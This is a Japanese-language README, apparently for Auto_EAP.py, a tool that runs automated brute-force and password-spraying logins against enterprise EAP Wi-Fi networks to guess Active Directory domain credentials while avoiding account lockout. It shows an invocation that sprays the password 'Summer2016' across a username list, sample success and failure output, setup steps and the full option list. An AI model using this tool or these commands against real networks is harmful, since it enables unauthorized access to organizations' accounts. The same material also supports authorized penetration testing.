
EAPネットワークに対する自動化されたブルートフォースログイン攻撃。
Auto_EAP.pyは、様々な種類のEAPネットワークに対して自動化されたブルートフォース認証攻撃を実行するように設計されたスクリプトです。これらの種類の無線ネットワークは、RADIUSサーバーがActive Directoryに対して認証をチェックする際に、ドメイン認証情報のパスワード推測を容易にするインターフェースを提供します。Jouni Malinen [email protected] によって作成されたPythonライブラリwpaspyを使用して、wpa_supplicantデーモンと対話することで、アカウントロックアウトを引き起こさない意図で自動化された認証攻撃を実行できます。
./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0
Initialized...
Trying Username Alice with Password test: SUCCESS
Trying Username Bob with Password test: FAILED
Trying Username Charles with Password test: FAILED
Trying Username David with Password test: SUCCESS
Completed
Auto_EAPのルートディレクトリ内で'RunMeFirst.py'を実行してください。これにより、wpaspyライブラリがコンパイルされ、Auto_EAP.pyがテストに使用するスタンドアロンのwpa_supplicant.confファイルがセットアップされ、システムのwpa_supplicant設定ファイルは変更されません。
./Auto_EAP.py -h
usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K
Key_mgmt -E Eap_type
optional arguments:
-h, --help show this help message and exit
-i Interface, --interface Interface
The Interface to use
-s SSID, --ssid SSID The SSID to attack
-U Usernamefile, --User Usernamefile
Path to username file
-p Password, --password Password
Password to use
-K Key_mgmt, --key_mgmt Key_mgmt
Key_Management type to use
-E Eap_type, --eap_type Eap_type
Eap type to use